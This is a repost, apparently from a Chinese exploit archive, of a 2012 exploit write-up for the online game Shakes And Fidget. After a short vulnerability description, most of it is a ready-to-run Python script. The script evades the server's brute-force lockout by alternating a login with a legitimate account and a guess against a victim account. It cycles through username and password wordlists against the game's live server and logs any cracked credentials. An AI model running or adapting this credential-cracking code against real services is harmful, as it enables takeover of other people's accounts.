首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Shakes And Fidget - Brute Force Protection Bypass
来源:http://snakingmax.blogspot.com 作者:SnakingMax 发布时间:2012-07-10   
 # Exploit Title: [Shakes And Fidget - Brute Force Protection Bypass]
 # Date: [04/07/2012]
 # Author: [SnakingMax]
 # Website: http://snakingmax.blogspot.com/
 # Software Link: [http://www.sfgame.es/]
 # Vendor: Playa Games GmbH
# Category: [Remote Exploit]


# Vulnerability description:
# Bypass brute force protection by alternating a positive attempt (legitimate account)
# with a test attempt (victim's account).
#
# 26/12/2011 - Vendor informed
# 04/07/2012 - Vulnerability not fixed


######################### EXPLOIT CODE (python 3) ############################

import sys, time, hashlib
from random import randrange
from http.client import HTTPConnection
import urllib.request

	
def str2md5( string ):
	return hashlib.md5(string.encode('utf-8')).hexdigest()


def tryUserPass(username, password):
	print("Trying User: "+username+" and Pass:"+password)
	conn = HTTPConnection('s4.sfgame.es')
	# positive attempt (legitimate account)
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002sfbf%3Bacc1c81abcdab1f53cfdfe7030c076bc%3Bv1.60&random=%2&rnd=0")
	response = conn.getresponse()
	response.close()
	conn.close()
	conn = HTTPConnection('s4.sfgame.es')
	# test attempt (victim's account)
	conn.request('GET', "/request.php?req=00000000000000000000000000000000002{0}%3B{1}%3Bv1.60&random=%2&rnd={2}".format(username.strip(),str2md5(str(password.strip())), randrange(999999)))
	response = conn.getresponse()
	data = response.read()[:10]
	response.close()
	conn.close()
	if (len(str(data)) > 7):
		print("Password found. See log.txt file.")
		return True
	else:
		return False

def bruteforce(userlist, pwdlist):
	usersFileList = open ( userlist , 'rt')
	dumpUsers = usersFileList.read()
	usersFileList.close()
	userl = dumpUsers.split()
	pwdFileList = open (pwdlist, 'rt')
	dumpPwd = pwdFileList.read()
	pwdl = dumpPwd.split()
	pwdFileList.close()
	for i in range(len(userl)):
		for j in range(len(pwdl)):
			if (tryUserPass(userl[i], pwdl[j])):
				log = open ('log.txt', 'at')
				log.write("\n------PASSWORD FOUND------\nUsername: " + userl[i] + "\nPassword: " + pwdl[j] + "\n--------------------------")
				log.close()

if ( (__name__)=="__main__" ):
	if len(sys.argv) != 3:
		print("usage:\n")
		print( sys.argv[0]+" [userlist.txt] [pwdlist.txt]\n\n")
		print("Downloaded from: http://snakingmax.blogspot.com/")
	else:
		userlist = sys.argv[1];
		pwdlist = sys.argv[2];
		print("Trying Username/Password combinations...")
		bruteforce(userlist, pwdlist)

######################### END OF EXPLOIT CODE (python 3) ############################
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Poison Ivy 2.3.2 C&C Server Bu
·.Net Framework Tilde Character
·Umbraco CMS Remote Command Exe
·Solar FTP Server 2.2 Remote DO
·Tiki Wiki <= 8.3 unserialize()
·Python Untrusted Search Path/C
·Basilic 1.5.14 diff.php Arbitr
·AdminStudio LaunchHelp.dll Act
·Apache Sling 2.1.0 Denial Of S
·Check Point Abra Bypass / Comm
·Linux Kernel Local Denial Of S
·Plow 0.0.5 Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved